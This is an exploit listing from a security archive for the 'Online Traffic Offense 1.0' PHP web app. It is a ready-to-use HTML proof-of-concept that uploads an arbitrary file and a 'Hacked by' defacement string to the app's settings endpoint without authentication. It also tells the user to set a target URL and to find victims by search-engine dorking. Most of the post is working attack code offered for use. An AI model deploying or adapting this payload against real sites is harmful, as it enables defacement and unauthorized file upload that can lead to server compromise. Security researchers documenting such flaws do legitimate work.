Online Traffic Offense 1.0 CSRF / Arbitrary File Upload ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[11] Download^[12]

=============================================================================================================================================
| # Title     : Online Traffic Offense 1.0 Auth by Pass Vulnerability                                                                       |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.
[+] Line 33 : Set your target url
[+] save payload as poc.html 
[+] payload : 
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Direct File Upload</title>
</head>
<body>
<h2>Direct File Upload</h2>
<form id="uploadForm">
<label for="fileInput">Select File:</label>
<input type="file" id="fileInput" name="fileInput" required><br><br>
<button type="button" onclick="uploadFile()">Upload File</button>
</form>
<script>
function uploadFile() {
const fileInput = document.getElementById('fileInput').files[0];
if (!fileInput) {
alert('Please select a file.');
return;
}
const formData = new FormData();
formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');
formData.append('img', fileInput);
console.log("(+) Uploading file...");
fetch('http://127.0.0.1/traffic_offense/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL
method: 'POST',
body: formData
})
.then(response => response.text())
.then(data => {
if (data === '1') {
console.log("(+) File upload seems to have been successful!");
} else {
console.log("(-) Oh no, the file upload seems to have failed!");
}
})
.catch(error => console.error("(-) Error during file upload:", error));
}
</script>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

• Follow us on Twitter^[15]
• Follow us on Facebook^[16]
• Subscribe to an RSS Feed^[17]

File Tags

• ActiveX^[18] (933)
• Advisory^[19] (86,803)
• Arbitrary^[20] (17,071)
• BBS^[21] (2,859)
• Bypass^[22] (1,920)
• CGI^[23] (1,047)
• Code Execution^[24] (7,897)
• Conference^[25] (692)
• Cracker^[26] (845)
• CSRF^[27] (3,425)
• DoS^[28] (25,253)
• Encryption^[29] (2,394)
• Exploit^[30] (54,243)
• File Inclusion^[31] (4,273)
• File Upload^[32] (1,016)
• Firewall^[33] (822)
• Info Disclosure^[34] (2,913)
• Intrusion Detection^[35] (918)
• Java^[36] (3,156)
• JavaScript^[37] (908)
• Kernel^[38] (7,276)
• Local^[39] (14,850)
• Magazine^[40] (587)
• Overflow^[41] (13,220)
• Perl^[42] (1,435)
• PHP^[43] (5,268)
• Proof of Concept^[44] (2,409)
• Protocol^[45] (3,749)
• Python^[46] (1,658)
• Remote^[47] (31,880)
• Root^[48] (3,671)
• Rootkit^[49] (529)
• Ruby^[50] (640)
• Scanner^[51] (1,657)
• Security Tool^[52] (8,046)
• Shell^[53] (3,305)
• Shellcode^[54] (1,219)
• Sniffer^[55] (904)
• Spoof^[56] (2,297)
• SQL Injection^[57] (16,721)
• TCP^[58] (2,463)
• Trojan^[59] (690)
• UDP^[60] (919)
• Virus^[61] (674)
• Vulnerability^[62] (33,082)
• Web^[63] (10,138)
• Whitepaper^[64] (3,784)
• x86^[65] (970)
• XSS^[66] (18,299)
• Other^[67]

File Archives

• September 2024^[68]
• August 2024^[69]
• July 2024^[70]
• June 2024^[71]
• May 2024^[72]
• April 2024^[73]
• March 2024^[74]
• February 2024^[75]
• January 2024^[76]
• December 2023^[77]
• November 2023^[78]
• October 2023^[79]
• Older^[80]

Systems

• AIX^[81] (430)
• Apple^[82] (2,114)
• BSD^[83] (378)
• CentOS^[84] (61)
• Cisco^[85] (1,954)
• Debian^[86] (7,123)
• Fedora^[87] (1,693)
• FreeBSD^[88] (1,247)
• Gentoo^[89] (4,567)
• HPUX^[90] (881)
• iOS^[91] (389)
• iPhone^[92] (108)
• IRIX^[93] (220)
• Juniper^[94] (71)
• Linux^[95] (51,177)
• Mac OS X^[96] (696)
• Mandriva^[97] (3,105)
• NetBSD^[98] (256)
• OpenBSD^[99] (489)
• RedHat^[100] (16,794)
• Slackware^[101] (941)
• Solaris^[102] (1,615)
• SUSE^[103] (1,444)
• Ubuntu^[104] (9,845)
• UNIX^[105] (9,454)
• UnixWare^[106] (188)
• Windows^[107] (6,771)
• Other^[108]

© 2024 Packet Storm. All rights reserved.